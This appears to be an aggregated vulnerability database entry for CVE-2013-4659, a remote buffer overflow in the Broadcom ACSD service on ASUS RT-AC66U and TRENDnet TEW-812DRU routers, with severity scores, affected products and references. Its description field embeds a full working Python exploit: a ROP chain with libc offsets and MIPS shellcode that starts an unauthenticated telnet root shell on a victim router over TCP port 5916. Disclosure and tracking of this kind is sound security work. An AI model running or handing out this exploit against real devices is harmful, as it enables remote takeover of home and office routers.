ID

VAR-201703-0032


CVE

CVE-2013-4659


TITLE

ASUS RT-AC66U and TRENDnet TEW-812DRU Used by multiple vendor routers including Broadcom ACSD Vulnerable to buffer overflow

Trust: 0.8

sources: JVNDB: JVNDB-2013-006764

DESCRIPTION

Buffer overflow in Broadcom ACSD allows remote attackers to execute arbitrary code via a long string to TCP port 5916. This component is used on routers of multiple vendors including ASUS RT-AC66U and TRENDnet TEW-812DRU. The ASUS RT-AC66U is a dual-band wireless router. ASUS RT-AC66U Broadcom acsd Wireless Channel Service (Wireless Channel Servic) has multiple buffer overflow vulnerabilities that allow remote attackers to exploit a vulnerability to submit a malicious request to stop the device from responding or possibly execute arbitrary code. ASUS RT-AC66U is prone to multiple buffer-overflow vulnerabilities. Failed exploit attempts will likely result in denial-of-service conditions. The former is produced by ASUS, and the latter is produced by TRENDnet in the United States. Broadcom ACSD is one of the wireless channel service components. A buffer overflow vulnerability exists in the Broadcom ACSD component used in the ASUS RT-AC66U and TRENDnet TEW-812DRU. #!/usr/bin/env python import signal, struct from time import sleep from socket import * from sys import exit, exc_info # # Title*******************ASUS RT-AC66U Remote Root Shell Exploit - acsd param command # Discovered and Reported*June 2013 # Discovered/Exploited By*Jacob Holcomb/Gimppy and Jacob Thompson # *Security Analsyts @ Independent Security Evaluators # Software Vendor*********http://asus.com # Exploit/Advisory********http://securityevaluators.com, http://infosec42.blogspot.com/ # Software****************acsd wireless service (Listens on TCP/5916) # Firmware Version********3.0.0.4.266 (Other versions were not tested and may be vulnerable) # CVE*********************ASUS RT-AC66U Multiple Buffer Overflows: CVE-2013-4659 # # Overview: # The ASUS RT-AC66U contains the Broadcom ACSD Wireless binary that is vulnerable to multiple # Buffer Overflow attacks. # # Multiple overflows exist in the following software: # # - Broadcom acsd - Wireless Channel Service (autochannel&param, autochannel&data, csscan&ifname commands) # def sigHandle(signum, frm): # Signal handler print "\n[!!!] Cleaning up the exploit... [!!!]\n" sleep(1) exit(0) def targServer(): while True: try: server = inet_aton(raw_input("\n[*] Please enter the IPv4 address of the ASUS RT-AC66U router:\n\n>")) server = inet_ntoa(server) break except: print "\n\n[!!!] Error: Please enter a valid IPv4 address. [!!!]\n\n" sleep(1) continue return server def main(): print ("""\n [*] Title: ASUS RT-AC66U Remote Root Shell Exploit - acsd param command [*] Discovered and Reported: June 2013 [*] Discovered/Exploited By: Jacob Holcomb/Gimppy and Jacob Thompson, Security Analysts @ ISE [*] Software Vendor: http://asus.com [*] Exploit/Advisory: http://securityevaluators.com, http://infosec42.blogspot.com/ [*] Software: acsd wireless service (Listens on TCP/5916) [*] Firmware Version: 3.0.0.4.266 (Other versions were not tested and may be vulnerable) [*] CVE: ASUS RT-AC66U Broadcom ACSD Buffer Overflow: CVE-2013-4659\n""") signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c victim = targServer() port = int(5916) acsdCmd = "autochannel&param=" #Vulnerable command - JH # base address of .text section of libc.so.0 in acsd's address space libc_base = 0x2ab25000 # ROP gadget #1 # lui s0,0x2 # li a0,1 # move t9,s1 # jalr t9 # ori a1,s0,0x2 ra1 = struct.pack("<L", libc_base + 0x2d39c) # ROP gadget #2 # move t9,s3 # lw ra,44(sp) # lw s4,40(sp) # lw s3,36(sp) # lw s2,32(sp) # lw s1,28(sp) # lw s0,24(sp) # jr t9 s1 = struct.pack("<L", libc_base + 0x34358) # sleep() - used to force program context switch (cache flush) s3 = struct.pack("<L", libc_base + 0x2cb90) # ROP gadget #3 # addiu a1,sp,24 # lw gp,16(sp) # lw ra,32(sp) # jr ra # addiu sp,sp,40 ra2 = struct.pack("<L", libc_base + 0xa1b0) # ROP gadget #4 # move t9,a1 # addiu a0,a0,56 # jr t9 # move a1,a2 ra3 = struct.pack("<L", libc_base + 0x3167c) # jalr sp jalr_sp = "\x09\xf8\xa0\x03" JuNk = "\x42" * 510 safeNop = "2Aa3" #80 Bytes system() Shellcode by Jacob Holcomb of ISE #Calling system() and executing telnetd -l /bin/sh shellcode = "\x6c\x6e\x08\x3c\x74\x65\x08\x35\xec\xff\xa8" shellcode += "\xaf\x64\x20\x09\x3c\x65\x74\x29\x35\xf0\xff" shellcode += "\xa9\xaf\x20\x2f\x0a\x3c\x2d\x6c\x4a\x35\xf4" shellcode += "\xff\xaa\xaf\x6e\x2f\x0b\x3c\x62\x69\x6b\x35" shellcode += "\xf8\xff\xab\xaf\x73\x68\x0c\x24\xfc\xff\xac" shellcode += "\xaf\xec\xff\xa4\x23\xec\xff\xbd\x23\xb4\x2a" shellcode += "\x19\x3c\x50\xf0\x39\x37\x09\xf8\x20\x03\x32" shellcode += "\x41\x61\x33" sploit = acsdCmd + JuNk + s1 + JuNk[0:4] + s3 + ra1 + JuNk[0:48] sploit += ra2 + JuNk[0:24]+ jalr_sp + safeNop + ra3 + JuNk[0:4] sploit += safeNop + shellcode try: print "\n [*] Creating network socket." net_sock = socket(AF_INET, SOCK_STREAM) except: print "\n [!!!] There was an error creating the network socket. [!!!]\n\n%s\n" % exc_info() sleep(1) exit(0) try: print " [*] Connecting to ASUS RT-AC66U router @ %s on port TCP/%d." % (victim, port) net_sock.connect((victim, port)) except: print "\n [!!!] There was an error connecting to %s. [!!!]\n\n%s\n" % (victim, exc_info()) sleep(1) exit(0) try: print """ [*] Attempting to exploit the acsd param command. [*] Sending 1337 ro0t Sh3ll exploit to %s on TCP port %d. [*] Payload Length: %d bytes.""" % (victim, port, len(sploit)) net_sock.send(sploit) sleep(1) except: print "\n [!!!] There was an error sending the 1337 ro0t Sh3ll exploit to %s [!!!]\n\n%s\n" % (victim, exc_info()) sleep(1) exit(0) try: print """ [*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed for code execution! [*] Closing network socket. Press ctrl + c repeatedly to force exploit cleanup.\n""" net_sock.close() except: print "\n [!!!] There was an error closing the network socket. [!!!]\n\n%s\n" % exc_info() sleep(1) exit(0) if __name__ == "__main__": main()

Trust: 2.7

sources: NVD: CVE-2013-4659 // JVNDB: JVNDB-2013-006764 // CNVD: CNVD-2013-11043 // BID: 61499 // VULHUB: VHN-64661 // VULMON: CVE-2013-4659 // PACKETSTORM: 122562

IOT TAXONOMY

category:['Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2013-11043

AFFECTED PRODUCTS

vendor:asusmodel:rt-ac66uscope:eqversion: -

Trust: 1.6

vendor:trendnetmodel:tew-812druscope:eqversion: -

Trust: 1.0

vendor:asustek computermodel:rt-ac66uscope: - version: -

Trust: 0.8

vendor:trendnetmodel:tew-812druscope: - version: -

Trust: 0.8

vendor:asusmodel:rt-ac66uscope:eqversion:3.0.0.4.266

Trust: 0.6

sources: CNVD: CNVD-2013-11043 // JVNDB: JVNDB-2013-006764 // CNNVD: CNNVD-201307-627 // NVD: CVE-2013-4659

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2013-4659
value: CRITICAL

Trust: 1.0

NVD: CVE-2013-4659
value: CRITICAL

Trust: 0.8

CNVD: CNVD-2013-11043
value: HIGH

Trust: 0.6

CNNVD: CNNVD-201307-627
value: CRITICAL

Trust: 0.6

VULHUB: VHN-64661
value: HIGH

Trust: 0.1

VULMON: CVE-2013-4659
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2013-4659
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.9

CNVD: CNVD-2013-11043
severity: HIGH
baseScore: 7.5
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-64661
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2013-4659
baseSeverity: CRITICAL
baseScore: 9.8
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 3.9
impactScore: 5.9
version: 3.0

Trust: 1.8

sources: CNVD: CNVD-2013-11043 // VULHUB: VHN-64661 // VULMON: CVE-2013-4659 // JVNDB: JVNDB-2013-006764 // CNNVD: CNNVD-201307-627 // NVD: CVE-2013-4659

PROBLEMTYPE DATA

problemtype:CWE-119

Trust: 1.9

sources: VULHUB: VHN-64661 // JVNDB: JVNDB-2013-006764 // NVD: CVE-2013-4659

THREAT TYPE

remote

Trust: 0.7

sources: PACKETSTORM: 122562 // CNNVD: CNNVD-201307-627

TYPE

buffer overflow

Trust: 0.6

sources: CNNVD: CNNVD-201307-627

CONFIGURATIONS

sources: JVNDB: JVNDB-2013-006764

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-64661 // VULMON: CVE-2013-4659

PATCH

title:Top Pageurl:https://www.asus.com/jp/

Trust: 0.8

title:Top Pageurl:http://www.trendnet.com/home

Trust: 0.8

sources: JVNDB: JVNDB-2013-006764

EXTERNAL IDS

db:NVDid:CVE-2013-4659

Trust: 3.6

db:PACKETSTORMid:122562

Trust: 2.7

db:BIDid:61499

Trust: 1.6

db:JVNDBid:JVNDB-2013-006764

Trust: 0.8

db:CNNVDid:CNNVD-201307-627

Trust: 0.7

db:CNVDid:CNVD-2013-11043

Trust: 0.6

db:NSFOCUSid:24219

Trust: 0.6

db:EXPLOIT-DBid:27133

Trust: 0.2

db:SEEBUGid:SSVID-80751

Trust: 0.1

db:SEEBUGid:SSVID-80752

Trust: 0.1

db:VULHUBid:VHN-64661

Trust: 0.1

db:VULMONid:CVE-2013-4659

Trust: 0.1

sources: CNVD: CNVD-2013-11043 // VULHUB: VHN-64661 // VULMON: CVE-2013-4659 // BID: 61499 // JVNDB: JVNDB-2013-006764 // PACKETSTORM: 122562 // CNNVD: CNNVD-201307-627 // NVD: CVE-2013-4659

REFERENCES

url:http://www.linux-magazine.com/issues/2014/161/security-and-soho-routers

Trust: 2.6

url:https://packetstormsecurity.com/files/122562/asus-rt-ac66u-acsd-remote-root-buffer-overflow.html

Trust: 2.6

url:https://nvd.nist.gov/vuln/detail/cve-2013-4659

Trust: 0.9

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-4659

Trust: 0.8

url:http://1337day.com/exploit/21033

Trust: 0.6

url:http://www.securityfocus.com/bid/61499

Trust: 0.6

url:http://www.nsfocus.net/vulndb/24219

Trust: 0.6

url:https://cwe.mitre.org/data/definitions/119.html

Trust: 0.1

url:http://tools.cisco.com/security/center/viewalert.x?alertid=33445

Trust: 0.1

url:https://www.exploit-db.com/exploits/27133/

Trust: 0.1

url:https://nvd.nist.gov

Trust: 0.1

url:http://asus.com

Trust: 0.1

url:http://securityevaluators.com,

Trust: 0.1

url:http://infosec42.blogspot.com/

Trust: 0.1

sources: CNVD: CNVD-2013-11043 // VULHUB: VHN-64661 // VULMON: CVE-2013-4659 // JVNDB: JVNDB-2013-006764 // PACKETSTORM: 122562 // CNNVD: CNNVD-201307-627 // NVD: CVE-2013-4659

CREDITS

Jacob Holcomb/Gimppy and Jacob Thompson

Trust: 0.9

sources: BID: 61499 // CNNVD: CNNVD-201307-627

SOURCES

db:CNVDid:CNVD-2013-11043
db:VULHUBid:VHN-64661
db:VULMONid:CVE-2013-4659
db:BIDid:61499
db:JVNDBid:JVNDB-2013-006764
db:PACKETSTORMid:122562
db:CNNVDid:CNNVD-201307-627
db:NVDid:CVE-2013-4659

LAST UPDATE DATE

2024-11-23T22:01:14.484000+00:00


SOURCES UPDATE DATE

db:CNVDid:CNVD-2013-11043date:2013-08-01T00:00:00
db:VULHUBid:VHN-64661date:2017-03-15T00:00:00
db:VULMONid:CVE-2013-4659date:2017-03-15T00:00:00
db:BIDid:61499date:2013-07-31T12:25:00
db:JVNDBid:JVNDB-2013-006764date:2017-04-05T00:00:00
db:CNNVDid:CNNVD-201307-627date:2017-03-15T00:00:00
db:NVDid:CVE-2013-4659date:2024-11-21T01:56:00.523

SOURCES RELEASE DATE

db:CNVDid:CNVD-2013-11043date:2013-08-01T00:00:00
db:VULHUBid:VHN-64661date:2017-03-14T00:00:00
db:VULMONid:CVE-2013-4659date:2017-03-14T00:00:00
db:BIDid:61499date:2013-07-29T00:00:00
db:JVNDBid:JVNDB-2013-006764date:2017-04-05T00:00:00
db:PACKETSTORMid:122562date:2013-07-26T20:22:22
db:CNNVDid:CNNVD-201307-627date:2013-07-29T00:00:00
db:NVDid:CVE-2013-4659date:2017-03-14T09:59:00.160